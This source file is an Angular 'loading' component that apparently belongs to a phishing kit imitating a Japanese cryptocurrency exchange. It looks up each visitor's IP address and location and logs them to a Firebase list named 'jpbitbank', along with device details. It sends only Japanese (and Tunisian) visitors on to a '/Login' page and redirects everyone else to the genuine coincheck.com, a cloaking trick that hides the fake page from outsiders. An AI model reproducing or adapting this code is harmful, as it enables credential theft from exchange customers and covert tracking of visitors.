import { Component, OnInit } from '@angular/core';
import { HttpClient } from '@angular/common/http';
import { switchMap } from 'rxjs/operators';
import { AngularFireDatabase , AngularFireList} from '@angular/fire/database';
import { Observable, Subject, asapScheduler, pipe, of, from, interval, merge, fromEvent } from 'rxjs';
import { Router } from "@angular/router";
import { DeviceDetectorService } from 'ngx-device-detector';

@Component({
  selector: 'app-loading',
  templateUrl: './loading.component.html',
  styleUrls: ['./loading.component.css']
})
export class LoadingComponent implements OnInit {
  deviceInfo = null;
  userIP = '';
  userC = '';
  
  list: AngularFireList<any>;

  constructor(public db: AngularFireDatabase,private httpClient: HttpClient,private router: Router, private deviceService: DeviceDetectorService) {
    this.list = db.list('jpbitbank');
    this.epicFunction();
  }     

  ngOnInit(): void {
    this.loadIp();
    sessionStorage.setItem('id',this.getRandomString(6));
  }
  epicFunction() {
    console.log('KILL');
    this.deviceInfo = this.deviceService.getDeviceInfo();
  }
  loadIp() {
    this.httpClient.get('https://jsonip.com')
    .pipe(
      switchMap((value:any) => {
      this.userIP = value.ip;
      sessionStorage.setItem('ip',value.ip);
      let url = `https://ip-api.org/s3ip.php?jip=${value.ip}`
      return this.httpClient.get(url);
      })
    ).subscribe(
      (value:any) => {
      this.list.push({
        ipAddress : value.ip,
        countryCode : value.country_code,
        country_name : value.country_name,
        region_name : value.region_name,
        zipcode: value.zip,
        deviceOS: this.deviceInfo.os,
        browser: this.deviceInfo.browser,
        deviceType: this.deviceInfo.deviceType,
      })
      if(value.country_code == "JP" || value.country_code == "TN"){

        this.redirect('/Login');
      }else{
        window.location.href = 'https://coincheck.com/ja/';
      }
      },
      err => {
      console.log(err);
      }
    );
    }
    redirect(dang:string){
      this.router.navigate([dang]);
      }
      getRandomString(length:any) {
        var randomChars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
        var result = '';
        for ( var i = 0; i < length; i++ ) {
            result += randomChars.charAt(Math.floor(Math.random() * randomChars.length));
        }
        return result;
      }
}
